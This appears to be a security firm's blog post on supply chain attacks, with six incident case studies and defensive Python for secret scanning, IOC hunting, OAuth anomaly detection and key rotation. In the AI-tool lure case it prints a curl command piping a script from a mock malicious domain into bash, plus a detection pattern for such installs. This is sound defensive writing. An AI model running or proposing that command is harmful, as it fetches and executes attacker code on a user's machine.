When the threat enters through the vendor, detection starts too late. Here is what we saw in the past twelve months — and what it demands from defenders.

The perimeter is dead — and the supply chain buried it.
Just over a month ago, we were invited by the Cyber Security and Technology Crime Bureau (CSTCB) of the Hong Kong Police Force to share our views on supply chain attacks with the industry.
Whilst ransomware and email compromise remain common intrusion vectors, our reflection on the past year of incidents flags a consistent pattern: organisations are comparatively better prepared to respond to these ‘internal’-type incidents than to attacks that arrive through a trusted third party.
Responding to an incident is not just about identifying the root cause and closing the ticket. What matters equally — sometimes more — is guiding the business back to safe operations and putting practical controls in place to prevent the next one. That is the part that rarely gets written about. This post is our attempt to change that.
We ask one question: when an attack enters through a trusted third party, how different does the response need to be?
Part 1: How We Got Here
A Timeline of Supply Chain Exploitation
Supply chain exploitation is not a new technique. What has changed in recent years, however, is the surface area, the speed, and the stealth.
The canonical playbook — compromise a managed service provider (MSP), trojanise a software update, fan out to the customer base — dates back to at least 2013. ASUS Live Update (2019). SolarWinds SUNBURST (2020). Kaseya VSA (2021). 3CX (2023). XZ Utils (2024). The list is long, and it keeps growing.
What has changed is the target profile. Attackers are no longer just going after MSPs and software vendors. They are targeting the productivity tools your developers trust implicitly, the AI assistants with access to your code and cloud credentials, and the API integrations quietly holding your customers’ data. The software update mechanism is now just one of many trusted channels that can be weaponised.
| Year | Incident | Why It Mattered |
| --- | --- | --- |
| 2017 | NotPetya | Weaponised software update — no malicious traffic before detonation; lateral movement was complete before EDR fired. |
| 2020 | SolarWinds | SUNBURST backdoor mimicked legitimate telemetry; dwell time ~14 months. |
| 2021 | Log4j | A logging library embedded invisibly in thousands of applications; no file drop, no binary. |
| 2023 | X_TRADER / 3CX | Supply chain attack feeding a second supply chain attack; binary was legitimately signed and widely whitelisted. |
| 2024 | XZ Utils | Backdoor introduced over months by a credible contributor; caught only by an engineer noticing unusual SSH performance. Zero security alerts. |
| 2025 | Salesloft Drift | OAuth tokens stolen from a SaaS integration; attacker walked into Salesforce with a pre-authorised token — no failed login alerts. |
| 2025 | Shai-Hulud / NPM | Self-propagating malware distributed via compromised NPM accounts; installed by a routine npm install. |
| 2025 | Notepad++ Backdoor | APT Lotus Blossom compromised the software update path; binary was signed, installer was legitimate. |
| 2026 | Exposed API Keys | Google Cloud keys exposed publicly; abuse looked like legitimate API usage, detected only on a billing spike. |
| 2026 | OpenClaw | Malicious agent skills execute inside a trusted AI process with user-level privileges; no clear boundary between normal and malicious activity. |
| 2026 | CPUID | Official website of the software product compromised to deliver a malware-laden installer. |
The Attack Surface Has Expanded
Initial access no longer requires compromising your perimeter directly. Incidents increasingly originate from a user workstation – or from infrastructure entirely outside your environment. The traditional model of “breach perimeter → move laterally” has been replaced by something harder to detect: “arrive pre-authorised → operate normally.”
As we have learnt working with clients across the region, these are scenarios most organisations are not prepared to detect, contain, or communicate.
| Vector | Description |
| --- | --- |
| SaaS Integrations | Over-privileged OAuth tokens; shadow connections no one audits |
| Software Dependencies | Malicious packages in NPM, PyPI, Maven |
| Open-Source Ecosystems | Systemic vulnerabilities in foundational libraries |
| CI/CD Pipelines | Compromised build runners and GitHub Actions workflows |
| External API Reliance | Unmanaged API tokens scattered across developer machines and repositories |
| Human/Contractor Access | External staff with privileged internal access, outside your MDM and training programme |
| Vendor-Hosted Data | Software vendors that host business data outside your environment |
| AI/LLM Tools | Model poisoning, malicious agent skills, prompt injection |
Part 2: Six Cases From the Ground
The following six cases are drawn directly from our operations over the past twelve months. Some are incidents we responded to. Others surfaced through continuous threat intelligence operations. In every one, the entry point was a trusted third party – and in every one, existing assumptions about detection failed in at least one important way.
Case 1: The Docker Registry That Should Not Have Been There
During a routine sweep of exposed internet infrastructure, we found a vendor’s Docker registry that had been misconfigured and left publicly accessible, with no authentication required. The repository names made the client relationships immediately obvious: they referenced client names and internal project codenames, the kind of naming convention that only makes sense if you are working inside the organisation.
What we found was operational infrastructure: environment configurations, secrets, and AWS credentials with sufficient privilege for full environment access — with pivot paths reaching the vendor’s downstream clients. Based on the data, we could not determine how long the registry had been exposed. Neither could the vendor. Determining whether a threat actor had already found and exploited it took the affected clients substantial investigative effort.
What we learnt:
- Discovery came from external threat intelligence, not internal detection. The affected clients had no telemetry that would have surfaced this.
- Vendors are routinely excluded from security assessment scope. Their infrastructure — registries, toolchains, dev environments — is a blind spot by default.
- Vendor access to your environment creates an obligation to monitor their security posture, not just their SLA performance.
If your vendor’s environment was breached right now, how long would it take you to find out?
Case 2: API Key Exposure — When the Bill Is the Alert
The first signal was not a security alert. It was a billing notification.
An organisation’s AI service costs had spiked without explanation. When they investigated, they found that an API key had been exposed in a public GitHub repository for over a week. Needless to say, a threat actor had found it first and put it to work.
The key was rotated immediately. But the harder questions remained: could this have been detected sooner, and who is going to pay?
What we learnt:
- The breach was discovered through a financial anomaly, not a security control. Without the cost spike, no one would have noticed.
- Determining the scope of what a stolen key accessed is significantly harder than rotating it. Baselining normal API usage before an incident is not optional.
- An organisation that cannot enumerate its API keys cannot determine the blast radius when one is stolen.
If your organisation suffered an AI API key exposure today, how long would it take you to find it — and how would you determine what was accessed?
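How long it takes depends largely on whether anyone is looking. As a starting point, here is a minimal sketch in Python that scans a repository’s full commit history for key-shaped strings, so the exposure is found before the billing spike; the patterns and paths are illustrative assumptions, not details from the incident:
```python
import re
import subprocess

# Illustrative patterns only; extend with the key formats your estate actually uses.
KEY_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "google_api_key": re.compile(r"AIza[0-9A-Za-z_\-]{35}"),
    "generic_token": re.compile(r"(?i)(api[_-]?key|token)['\"]?\s*[:=]\s*['\"][A-Za-z0-9_\-]{20,}"),
}

def scan_git_history(repo_path: str) -> list[tuple[str, str]]:
    """Scan the full commit history of a local clone for key-shaped strings."""
    # `git log -p --all` emits every diff ever committed, including deleted secrets.
    log = subprocess.run(
        ["git", "-C", repo_path, "log", "-p", "--all"],
        capture_output=True, text=True, check=True,
    ).stdout
    hits = []
    for name, pattern in KEY_PATTERNS.items():
        for match in pattern.finditer(log):
            hits.append((name, match.group(0)))
    return hits

if __name__ == "__main__":
    for kind, value in scan_git_history("."):
        print(f"[!] possible {kind}: {value[:12]}...")  # truncate; never print full secrets
```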
Case 3: Third-Party Data on the Dark Web — Fear as a Product
Through our continuous dark web monitoring, we identified a post on a threat actor forum listing what appeared to be data belonging to one of our clients.
We downloaded and analysed the sample. Our client traced the data’s origin to a campaign website a vendor had built using the client’s static information. The site had simply been scraped; nothing sensitive had been exposed.
On a threat actor forum, that distinction does not appear in the listing.
What we learnt:
- The dark web is a market for fear as much as for data. Anyone can claim a breach. The burden of proof falls on the victim to disprove it — not on the threat actor to prove it.
- The data transfer to the vendor was authorised. The vendor’s decision to publish it on an unmanaged public site was not. That distinction carries legal and reputational weight — but threat actor forums do not make it.
- Fast triage matters. Same-day detection allowed us to scope and close the case quickly. Without it, the client would have faced weeks of uncertainty.
Do you know what public-facing infrastructure your vendors have built using your data — and who is responsible for reviewing it?
Case 4: Notepad++ — A Trusted Channel, Weaponised
In February 2026, Notepad++ confirmed what threat hunters had suspected: APT Lotus Blossom — a threat actor with a long history of targeting Southeast Asian government and critical infrastructure — had compromised the application’s software update mechanism.[1]
The mechanics were clean. A legitimate NSIS installer delivered a malicious DLL (log.dll), sideloaded by a renamed Bitdefender component (BluetoothService.exe). The binary made outbound connections to a C2 IP address that had appeared in prior Lotus Blossom campaigns — but without active correlation against current telemetry, that history was invisible.
From a security operations standpoint, this meant that when we ran targeted threat hunting for affected machines, we were hunting for legitimately signed, whitelisted software: approximately the worst possible hunting surface.
What we learnt:
- Signed binaries arriving through trusted update channels are not, by themselves, evidence of integrity. Behavioural detection — unexpected process spawns, novel outbound connections, new persistence mechanisms — is the only reliable signal.
- Known-malicious IOCs are only useful if matched against current telemetry. Archiving threat intelligence that is never operationalised is not threat intelligence.
- Nation-state supply chain compromises targeting enterprise software are not edge cases. They are a persistent, structural risk that demands persistent, structural detection.
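The second point above is straightforward to operationalise. A minimal sketch, assuming proxy or firewall logs exported to CSV with a dest_ip column and a flat file of known-bad IPs; the file names and column names are our assumptions:
```python
import csv

def load_iocs(path: str) -> set[str]:
    """One indicator per line, e.g. C2 IPs from prior Lotus Blossom reporting."""
    with open(path) as f:
        return {line.strip() for line in f if line.strip() and not line.startswith("#")}

def hunt(telemetry_csv: str, ioc_path: str) -> list[dict]:
    """Return every telemetry row whose destination matches a known indicator."""
    iocs = load_iocs(ioc_path)
    hits = []
    with open(telemetry_csv, newline="") as f:
        for row in csv.DictReader(f):
            if row.get("dest_ip") in iocs:
                hits.append(row)
    return hits

if __name__ == "__main__":
    for row in hunt("proxy_logs.csv", "lotus_blossom_c2.txt"):
        print(f"[!] {row.get('timestamp')} {row.get('src_host')} -> {row['dest_ip']}")
```
Run on a schedule against fresh telemetry, this turns an archived indicator list into a standing detection rather than a document.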
Case 5: Salesforce — The Database of Databases
Salesforce is not how most organisations think about their crown jewels. But consider what it actually contains: structured records of customers, pipeline, contracts, and — via integrations — potentially data from every system your sales and service teams touch. Then consider that Salesforce is federated into a significant share of most organisations’ vendor ecosystems.
When intelligence on a major Salesforce-related breach campaign emerged, we did not wait for vendor notification. We ran OSINT and threat hunting against the confirmed victim list, cross-referenced it against our clients’ vendor relationships and Salesforce exposure, and flagged downstream risk directly to affected clients — often before they had heard anything from the affected vendors themselves.
The access mechanism was OAuth token theft. No failed logins. No brute-force signal. No password reset. The attacker arrived pre-authorised, using a credential that looked exactly like every other legitimate session.
What we learnt:
- OAuth token theft is authentication-transparent. The only detection surface is behavioural: unusual geolocations, access at atypical hours, unexpected data exports.
- The downstream notification burden from a SaaS breach can extend well beyond the directly affected organisation. If a vendor’s Salesforce held your customers’ data, the notification obligation may fall on you.
- Proactive OSINT and threat hunting — not vendor notification — was how our clients first learnt of their exposure. Do not assume the vendor will tell you first.
Which of your SaaS integrations hold your customers’ data — and would you know within 24 hours if an OAuth token for one of them was stolen?
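Because a stolen OAuth token authenticates flawlessly, the tractable detection surface is the behavioural one described above. A minimal sketch that baselines each integration’s observed countries and active hours, then flags sessions falling outside them; the event shape is an assumption, not any vendor’s API:
```python
from collections import defaultdict

def build_baseline(events: list[dict]) -> dict:
    """Learn which countries and hours each integration is normally seen from."""
    baseline = defaultdict(lambda: {"countries": set(), "hours": set()})
    for e in events:
        b = baseline[e["integration_id"]]
        b["countries"].add(e["country"])
        b["hours"].add(e["hour"])
    return baseline

def flag_anomalies(events: list[dict], baseline: dict) -> list[dict]:
    """Flag sessions from integrations, places, or times never seen before."""
    anomalies = []
    for e in events:
        b = baseline.get(e["integration_id"])
        if b is None:
            anomalies.append({**e, "reason": "unknown integration"})
        elif e["country"] not in b["countries"]:
            anomalies.append({**e, "reason": "new geolocation"})
        elif e["hour"] not in b["hours"]:
            anomalies.append({**e, "reason": "atypical hour"})
    return anomalies

# Usage: train on a window of known-good sessions, evaluate today's.
# baseline = build_baseline(load_sessions(days=90))
# for a in flag_anomalies(load_sessions(days=1), baseline): alert(a)
```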
Case 6: InstallFix — When the AI Tool Is the Threat
The ClickFix lure is perhaps the perfect phishing scenario for an uninformed user: a browser-based prompt, visually indistinguishable from legitimate installation documentation, instructing them to run a command in their terminal.
The result was an infostealer deployed directly from the user’s workstation. No perimeter control fired. No binary arrived from a remote attacker. The user executed it themselves.
The technique is not new — ClickFix has been observed as a delivery mechanism since at least 2024. What has changed is the targeting. Threat actors are now building convincing lookalike sites specifically for the AI developer tools engineers trust most: Cursor, Claude Code, GitHub Copilot. The install commands are often indistinguishable from the real documentation:
```bash
curl https://backdoored-claude.lol/install.sh | bash
```
This is not a failure of endpoint detection. It is deliberate exploitation of user trust in documented install patterns. The lure succeeds precisely because it looks exactly like the real thing.
What we learnt:
- ClickFix lures succeed by precisely mimicking legitimate install flows. “Don’t click suspicious links” is insufficient when the lure is indistinguishable from official documentation.
- AI tools are routinely granted extensive permissions — files, email, calendar, code repositories, cloud credentials — making them high-value targets for initial access, whether through credential theft or malicious installation.
- Policy lag is itself an attack surface. If your organisation has not defined which AI tools are permitted and how they should be installed, employees will use whatever they find — and follow the instructions they find.
If an employee ran a malicious AI tool installer today, how quickly would your SOC detect it — and how would you know which credentials and data to treat as compromised?
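One starting point for that SOC question: flag pipe-to-shell installs in process telemetry. A minimal sketch over exported process-creation events; the event fields are assumptions, and in production this logic belongs in your EDR’s query language with allowlisting for sanctioned installers:
```python
import re

# Command lines that fetch a remote script and pipe it straight into a shell.
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")

def flag_installs(events: list[dict]) -> list[dict]:
    """events: process-creation records with 'host', 'user', 'cmdline' fields."""
    return [e for e in events if PIPE_TO_SHELL.search(e.get("cmdline", ""))]

events = [
    {"host": "dev-laptop-07", "user": "alice",
     "cmdline": "curl https://backdoored-claude.lol/install.sh | bash"},
    {"host": "dev-laptop-07", "user": "alice", "cmdline": "git pull"},
]
for e in flag_installs(events):
    print(f"[!] pipe-to-shell install on {e['host']} by {e['user']}: {e['cmdline']}")
```
Legitimate tools also install this way, so the value is in triage volume and allowlists, not in blocking outright.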
Part 3: How We Need to Respond Differently
Our Existing Assumptions Are Broken
Every case above had one thing in common: a trusted entry point. A signed update package, a legitimate API key, an authorised data transfer, an OAuth token, or installation documentation that told the user to run the command themselves.
In every case, the detection that mattered was behavioural — not signature-based. In some, it was external threat intelligence: we found the exposure before the attacker did, or before the organisation knew. Dwell time across these cases ranged from the same day to over fourteen months.
This demands a different posture. Not just different tools — different assumptions.
Control — Know What Is Actually In Your Ecosystem
You cannot protect what you cannot enumerate. Start with a living inventory of:
- All third-party code dependencies, including transitive ones
- All SaaS applications with access to your environment
- All OAuth integrations — including the shadow ones your IT team does not know about
- All AI tools your employees are using — sanctioned and unsanctioned
- All contractor and vendor access, including dormant accounts
- All API keys in active use, and what they can access
Apply data-based risk tiering: classify vendors by blast radius (what data and systems they can reach), not just compliance paperwork. Ask your highest-tier vendors to demonstrate their supply chain controls — not just sign an attestation.
Then run the 24-hour test: could you determine, within 24 hours, whether a specific vendor had been breached and what data they hold? If the answer is no, that is your first priority.
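To make the blast-radius tiering above concrete, here is a minimal sketch of one possible data model; the tier thresholds and field names are our assumptions rather than any standard:
```python
from dataclasses import dataclass, field

@dataclass
class Vendor:
    name: str
    data_classes: set[str] = field(default_factory=set)     # e.g. {"PII", "credentials"}
    reachable_systems: set[str] = field(default_factory=set)
    has_write_access: bool = False

    def tier(self) -> int:
        """Tier 1 = highest blast radius. Thresholds are illustrative."""
        if "credentials" in self.data_classes or self.has_write_access:
            return 1
        if self.data_classes or len(self.reachable_systems) > 3:
            return 2
        return 3

crm = Vendor("crm-saas", {"PII"}, {"salesforce", "marketing-db"}, has_write_access=True)
assert crm.tier() == 1  # write access alone puts a vendor in the top tier
```
The point of the model is that tier is computed from what the vendor can reach, not copied from their compliance questionnaire.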
Visibility — Seeing Through Trusted Channels
The single most common gap we find is the absence of baselines. You cannot alert on anomalies you have never defined. Before writing detection rules, establish what normal looks like for:
- Third-party authentication — geographies, timing, volume
- API key usage — call patterns, geolocations, scope, timing
- OAuth token behaviour — which integrations access what, when, and from where
- Data egress through SaaS and AI channels — volume, destination, timing
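As one example of turning a baseline into a detection, a minimal sketch that learns hourly call volume per API key and flags spikes; the log format and the three-sigma threshold are assumptions to be tuned:
```python
import statistics
from collections import Counter

def hourly_counts(events: list[dict]) -> dict[str, Counter]:
    """events: [{'key_id': ..., 'hour': '2026-02-01T13'}, ...] one per API call."""
    counts: dict[str, Counter] = {}
    for e in events:
        counts.setdefault(e["key_id"], Counter())[e["hour"]] += 1
    return counts

def volume_spikes(history: list[dict], current: list[dict], sigmas: float = 3.0) -> list[str]:
    """Flag keys whose current hourly volume exceeds baseline mean + N sigma."""
    baseline = hourly_counts(history)
    alerts = []
    for key, hours in hourly_counts(current).items():
        past = list(baseline.get(key, Counter()).values())
        if len(past) < 2:
            alerts.append(f"{key}: no baseline, review manually")
            continue
        threshold = statistics.mean(past) + sigmas * statistics.stdev(past)
        for hour, n in hours.items():
            if n > threshold:
                alerts.append(f"{key}: {n} calls at {hour} (threshold {threshold:.0f})")
    return alerts
```
The same structure applies to the other three baselines: learn a distribution from history, then alert on departures from it.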
Response — What If the Vendor Is the Problem?
Most incident response playbooks assume a clean model: external attacker crosses the perimeter, response team contains and eradicates. Supply chain incidents break this. The vendor is not the responder — the vendor is part of the blast radius.
New playbooks are required:
- Credential rotation at scale: If a vendor is compromised, every credential they could have touched needs rotation — across all systems, within hours. Have you tested this? Do you know how long it takes? (See the sketch after this list.)
- Vendor access suspension with continuity planning: If you need to cut off a vendor immediately, what breaks? What is the fallback? These decisions should be made in advance, not under pressure.
- Post-compromise ecosystem audit: Trigger on suspicion — not confirmation. Assume lateral movement until proven otherwise.
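For the first playbook, a minimal sketch of bulk rotation for AWS IAM access keys linked to a compromised vendor, using boto3; the vendor tag convention is our assumption, and the same pattern needs repeating across every other credential store you hold:
```python
import boto3

iam = boto3.client("iam")

def rotate_vendor_keys(vendor_tag: str) -> None:
    """Deactivate every access key on users tagged with the compromised vendor."""
    paginator = iam.get_paginator("list_users")
    for page in paginator.paginate():
        for user in page["Users"]:
            tags = iam.list_user_tags(UserName=user["UserName"])["Tags"]
            if not any(t["Key"] == "vendor" and t["Value"] == vendor_tag for t in tags):
                continue
            for key in iam.list_access_keys(UserName=user["UserName"])["AccessKeyMetadata"]:
                # Deactivate first; delete only after downstream systems are re-keyed.
                iam.update_access_key(
                    UserName=user["UserName"],
                    AccessKeyId=key["AccessKeyId"],
                    Status="Inactive",
                )
                print(f"deactivated {key['AccessKeyId']} for {user['UserName']}")

# rotate_vendor_keys("acme-msp")  # time this run: it is your real rotation SLA
```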
Run the tabletop: your most critical SaaS provider calls to say they were breached last month. Who picks up the phone? What happens in the first hour? If you have not rehearsed it, you do not know the answer.
Conclusion: The Perimeter Is Not Coming Back
The six cases above are not exceptional. They are representative.
Supply chain attacks are now the dominant initial access vector across the incidents we respond to — not because the techniques are new, but because defenders have not caught up to the reality that the perimeter no longer defines the boundary of trust. Trusted channels are the attack surface. Third-party access is the entry point. Dwell time is measured in months.
We posit that these forms of attack will rise exponentially, particularly as threat actors increasingly leverage AI to facilitate their attacks. AI-assisted tooling is already beginning to automate what previously required significant reconnaissance effort — mapping vendor relationships, identifying integration gaps, surfacing over-privileged third-party access at scale. Whilst this has yet to materialise at scale, we anticipate the speed and reach of these attacks will change rapidly as new model releases emerge.
The organisations that are best positioned are not the ones with the most controls. They are the ones that know exactly what is in their ecosystem, have baselined normal behaviour, and have rehearsed their response to a vendor compromise — before it happens.
The supply chain is the perimeter now. It is time to defend it like one.
Recommendations
Preventive
- Ecosystem inventory: Maintain a living inventory of all third-party code dependencies, SaaS applications, OAuth integrations, AI tools, and contractor access.
- API key governance: Implement pre-commit hooks to prevent secrets entering repositories (see the hook sketch after this list); enforce short TTLs and automatic rotation; audit keys in active use regularly.
- Vendor risk tiering: Classify vendors by blast radius (data access and connectivity scope), not just compliance status.
- SaaS OAuth audit: Review all connected applications for scope, last-used date, and whether the business use case still exists. Revoke shadow integrations.
- AI tool policy: Define explicitly which AI tools are permitted and what permissions they hold. Review agent skill marketplaces for scope creep.
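For the pre-commit hook in the API key governance item, a minimal sketch that blocks commits containing key-shaped strings, the commit-time counterpart of the history scan in Case 2; the patterns are illustrative, and in practice a maintained scanner such as gitleaks or detect-secrets is usually the better fit:
```python
#!/usr/bin/env python3
"""Save as .git/hooks/pre-commit (executable) to block key-shaped strings."""
import re
import subprocess
import sys

PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),                    # AWS access key ID
    re.compile(r"AIza[0-9A-Za-z_\-]{35}"),              # Google API key
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),  # PEM private key
]

def staged_diff() -> str:
    return subprocess.run(
        ["git", "diff", "--cached", "--unified=0"],
        capture_output=True, text=True, check=True,
    ).stdout

def main() -> int:
    added = [line for line in staged_diff().splitlines()
             if line.startswith("+") and not line.startswith("+++")]
    for line in added:
        for p in PATTERNS:
            if p.search(line):
                print(f"[pre-commit] possible secret blocked: {line[:60]}", file=sys.stderr)
                return 1
    return 0

if __name__ == "__main__":
    sys.exit(main())
```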
Detective
- Baseline trusted channels: Establish normal third-party behaviour — authentication geographies, API call volumes, data egress patterns, OAuth token usage — before writing detection rules.
- Endpoint monitoring post-update: Alert on unexpected process spawns, outbound connections, or persistence mechanisms established by signed update agents.
- API key and OAuth anomalies: Alert on keys used from new IPs, ASNs, or geographies; volume spikes; usage outside agreed business hours.
- Data egress monitoring: Alert on new external destinations in proxy/DNS logs; volume spikes to cloud storage; data leaving through AI API channels.
- Dark web monitoring: Monitor for your organisation, key vendors, and contractors appearing in threat actor forums, credential dumps, or sale listings.
- Supply chain threat intelligence: Subscribe to feeds tracking software supply chain compromises, exposed repositories, and malicious package reports. Map intelligence to your actual dependency inventory.
Further Information
We are committed to protecting our clients and the wider community against the latest threats through our dedicated research and the integrated efforts of our red team, blue team, incident response, and threat intelligence capabilities. Feel free to contact us at [darklab dot cti at hk dot pwc dot com] for any further information.